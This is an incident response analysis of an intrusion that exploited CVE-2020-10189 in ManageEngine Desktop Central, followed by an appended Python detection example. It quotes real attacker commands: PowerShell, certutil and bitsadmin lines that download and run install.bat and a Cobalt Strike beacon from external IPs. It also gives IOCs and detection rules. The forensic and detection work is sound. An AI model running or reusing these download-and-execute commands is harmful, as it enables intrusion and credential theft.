Analysis Of Exploitation: CVE-2020-10189

By Luke Rusten
Archived: 2026-04-05 15:23:53 UTC

The Recon incident response team recently worked an intrusion case involving a ManageEngine Desktop Central server that was affected by CVE-2020-10189.

Zoho ManageEngine Desktop Central 10 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.
https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle

Remote Code Execution vulnerability disclosed on Twitter

During our research of Desktop Central vulnerabilities we located a post on Twitter from a researcher who had disclosed an RCE for Desktop Central on March 5, 2020 (Figure 1).

Figure 1 - Vulnerability disclosed on Twitter

Research on CVE-2020-10189 also showed that vulnerable Desktop Central servers were searchable on Shodan, a popular search engine for Internet-connected devices often used by attackers looking for vulnerable targets (Figure 2).

Figure 2 - Vulnerable Desktop Central servers searchable on Shodan

https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/ Page 1 of 11

Initial compromise was determined based on a suspicious PowerShell download cradle that contained instructions to download files from a dotted-quad URL. One of the earliest activities carried out by the actor was a series of suspicious PowerShell download commands. The commands contained instructions to download install.bat and storesyncsvc.dll to C:\Windows\Temp and then immediately execute install.bat (Figure 3).

    cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.

Figure 3 - Suspicious PowerShell download commands

The install.bat script contained instructions to install storesyncsvc.dll as a service on the system (Figure 4).
Figure 4 - Install.bat contents

Predictably, within seconds of the suspicious PowerShell commands being run, we observed the installation of a new service with the Service Name StorSyncSvc and Display Name Storage Sync Service (Figure 5).

Figure 5 - Storage Sync Service install

OSINT quickly confirmed that storesyncsvc.dll had previously been observed by others hit by this campaign. VirusTotal results indicated that several detection engines had already classified storesyncsvc.dll as malware.
https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details

Leveraging Process Tracking to Identify Application Exploitation

Knowing that an RCE had been disclosed via Twitter on March 5, 2020, only a few days prior to this intrusion, we already had a strong theory that the attack vector was exploitation of the Zoho ManageEngine Desktop Central application. Review of Sysmon process creation events indicated that C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe was the process responsible for executing the PowerShell download commands (Figure 6).

Figure 6 - ParentImage responsible for PowerShell download

Looking at processes in memory, we also observed the parent/child relationship between the Desktop Central java.exe application, cmd.exe and 2.exe (Figure 7).

Figure 7 - java.exe parent/child process relationships

Leveraging Filesystem Artifacts to Identify Application Exploitation

To further validate our theory, we compared the artifacts collected from the affected Desktop Central server to the published POC and determined that the attacker had likely leveraged the CVE-2020-10189 vulnerability to run code on this vulnerable system.
Through filesystem timeline analysis we determined that a traversal file write had likely occurred on the system with the file names _chart (Figure 8) and logger.zip (Figure 9).

Figure 8 - File system analysis: _chart

Figure 9 - File system analysis: logger.zip

These file names were also referenced in the POC that had been released by @Steventseeley (Figure 10).

Figure 10 - POC references to _chart and logger.zip, reference: https://srcincite.io/pocs/src-2020-0011.py.txt

Command and Control Payload Introduced To System

Subsequent process creation logs revealed cmd.exe and certutil.exe commands being used to download and execute 2.exe (Figure 11). Further analysis revealed a high likelihood of 2.exe being part of the popular post-exploitation and C2 tool Cobalt Strike.

    cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe

Figure 11 - Certutil commands

OSINT revealed that 2.exe was already identified as malware by several detection engines on VirusTotal:
https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/detai

Leveraging the app.any.run sandbox (Figure 12) and memory analysis of the malware further confirmed the likelihood of 2.exe being a hosted Cobalt Strike Beacon payload.

Figure 12 - 2.exe classified as Cobalt Strike Beacon
https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6

YARA ANALYSIS SUPPORTS 2.EXE CLASSIFICATION AS COBALT STRIKE

We performed a yara scan against all memory sections in use by the known malware, 2.exe. The yara scan results further supported the theory of 2.exe resembling a Cobalt Strike beacon, among several other possible malware signature hits (Figure 13).
Figure 13 - Yarascan results

Leveraging Volatility's malfind plugin, we identified several memory sections with potential signs of code injection. We fired off another yara scan, this time against the memory sections dumped by malfind. This provided additional validation of the likely presence of a Cobalt Strike Beacon. See that entire process in the asciinema recording below (Figure 14).

    total 12M
    drwxr-xr-x 2 root root 4.0K Mar 9 20:36 .
    drwxr-xr-x 3 root root 4.0K Mar 10 02:35 ..
    -rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a1bd05080.0xe40000.dmp
    -rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a1d486800.0x1170000.dmp
    -rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a1d486800.0x3790000.dmp
    -rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a1ddaf080.0xfe0000.dmp
    -rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a21f78740.0x1aaf8510000.dmp
    -rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a23986800.0x20a9a9e0000.dmp
    -rw-r--r-- 1 root root 1.0M Mar 9 20:36 process.0xffffd00a2502d280.0x2131e280000.dmp
    -rw-r--r-- 1 root root 2.0M Mar 9 20:36 process.0xffffd00a2502d280.0x2131e380000.dmp
    -rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a2d400800.0x120000.dmp
    -rw-r--r-- 1 root root 4.0M Mar 9 20:36 process.0xffffd00a2d400800.0x2660000.dmp
    -rw-r--r-- 1 root root 276K Mar 9 20:36 process.0xffffd00a2d400800.0x2ca0000.dmp
    -rw-r--r-- 1 root root 4.5M Mar 9 20:36 process.0xffffd00a2d7ef800.0x21738f20000.dmp
    root@siftworkstation : /cases/desktopcentral/DesktopCentral # apt install yara -y
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    The following NEW packages will be installed:
      yara
    0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
    Need to get 117 kB of archives.
    After this operation, 555 kB of additional disk space will be used.
    Get:1 http://us.archive.ubuntu.com/ubuntu xenial/universe amd64 yara amd64 3.4.0+dfsg-2build1 [117 kB]
    Fetched 117 kB in 0s (191 kB/s)
    Selecting previously unselected package yara.
    (Reading database ... 251659 files and directories currently installed.)
    Preparing to unpack .../yara_3.4.0+dfsg-2build1_amd64.deb ...
    Unpacking yara (3.4.0+dfsg-2build1) ...
    Processing triggers for man-db (2.7.5-1) ...
    Setting up yara (3.4.0+dfsg-2build1) ...
    root@siftworkstation : /cases/desktopcentral/DesktopCentral #

Figure 14 - Yarascan against malfind output

We then examined malfind's output for evidence of code injection and identified suspicious memory sections within svchost.exe (Figure 15). OSINT research led us to a researcher who had reversed the malware and found the area responsible for injecting code into svchost.exe (Figure 16).

Figure 15 - Our analysis of svchost containing injected code

Figure 16 - @VK_Intel's analysis showing likely inject function
Reference:

Among the post-compromise activities, we observed malicious Bitsadmin commands that contained instructions to transfer install.bat from 66.42.96.220 over suspicious port 12345. Our analysts observed bitsadmin commands being run on the Desktop Central server which contained the same IP address, port and install.bat file called in the PowerShell download commands (Figure 17).

    cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat

Figure 17 - Bitsadmin commands

Credential Access

We also observed potential credential access activity. A common technique attackers use for credential dumping is a malicious process (the SourceImage) accessing another process (the TargetImage). Most commonly, lsass.exe is targeted, as it often contains sensitive information such as account credentials.
Here, we observed the SourceImage 2.exe accessing the TargetImage lsass.exe (Figure 18). The Cobalt Strike Beacon contains native credential dumping capabilities similar to Mimikatz. The only condition required to use this capability is SYSTEM privileges, which the attacker had. The event below provides sufficient evidence that the risk of credential access is high.

Figure 18 - 2.exe accessing lsass.exe

During our analysis of this intrusion, we added a few collection targets to Eric Zimmerman's KAPE tool to add the relevant logs to triage efforts. Read more about KAPE.

Example usage targeting relevant logs (tune for your use-case):

    kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs

IOCs

Storesyncsvc.dll
MD5: 5909983db4d9023e4098e56361c96a6f
SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

Install.bat
MD5: 7966c2c546b71e800397a67f942858d0
SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

2.exe
MD5: 3e856162c36b532925c8226b4ed3481c
SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

66[.]42[.]98[.]220
91[.]208[.]184[.]78
74[.]82[.]201[.]8

Detection

Florian Roth of the Sigma project has created a signature to detect some of the techniques leveraged by the attackers:
https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml

Our analysis of this attack also found that detection based on command-line activity in process creation logs would be valuable.
    ParentImage | endswith: 'DesktopCentral_Server\jre\bin\java.exe'
    CommandLine | contains:
        '*powershell*'
        '*certutil*'
        '*bitsadmin*'

Tags: DFIR, Incident Response, Forensics, SecOps, InfoSec, Defense, Malware, Exploit, CVE-2020-10189, Intel Sharing, Zoho, Vulnerability, ManageEngine

Source: https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
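The process-creation rule above and the lsass.exe access pattern from the Credential Access section, as an added example that is not code from the Recon post: a small Python pass over constructed Sysmon-style records (field names follow Sysmon Event IDs 1 and 10; the lsass allow-list is a hypothetical starting point, not a vetted list).

```python
# Added example, not code from the Recon write-up: a minimal detection pass over
# Sysmon-style process creation (Event ID 1) and process access (Event ID 10)
# records. The records below are constructed sample data, not real telemetry.

SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "CommandLine": r"cmd /c powershell $client = new-object System.Net.WebClient;..."},
    {"EventID": 1, "ParentImage": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "CommandLine": r"cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",   # benign parent: no alert
     "CommandLine": r"cmd /c powershell Get-Process"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\2.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",   # expected: no alert
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
]

DOWNLOAD_TOOLS = ("powershell", "certutil", "bitsadmin")
JAVA_PARENT_SUFFIX = r"desktopcentral_server\jre\bin\java.exe"
# Hypothetical allow-list of images that legitimately open lsass.exe;
# tune this for the environment before relying on it.
LSASS_EXPECTED_SOURCES = (r"\csrss.exe", r"\wininit.exe", r"\services.exe", r"\lsass.exe")

def desktop_central_spawned_downloader(ev):
    """Rule 1: Desktop Central's java.exe launching a download utility."""
    if ev.get("EventID") != 1:
        return False
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    return parent.endswith(JAVA_PARENT_SUFFIX) and any(t in cmd for t in DOWNLOAD_TOOLS)

def unexpected_lsass_access(ev):
    """Rule 2: a process outside the allow-list opening a handle to lsass.exe."""
    if ev.get("EventID") != 10:
        return False
    src = ev.get("SourceImage", "").lower()
    tgt = ev.get("TargetImage", "").lower()
    return tgt.endswith(r"\lsass.exe") and not src.endswith(LSASS_EXPECTED_SOURCES)

def scan(events):
    """Return (rule_name, event) pairs for every record that matches a rule."""
    hits = []
    for ev in events:
        if desktop_central_spawned_downloader(ev):
            hits.append(("desktop_central_download_cradle", ev))
        if unexpected_lsass_access(ev):
            hits.append(("unexpected_lsass_access", ev))
    return hits
```

Running scan(SAMPLE_EVENTS) flags the two java.exe-spawned download commands and the 2.exe handle to lsass.exe, while the explorer.exe-spawned PowerShell and the csrss.exe access stay quiet.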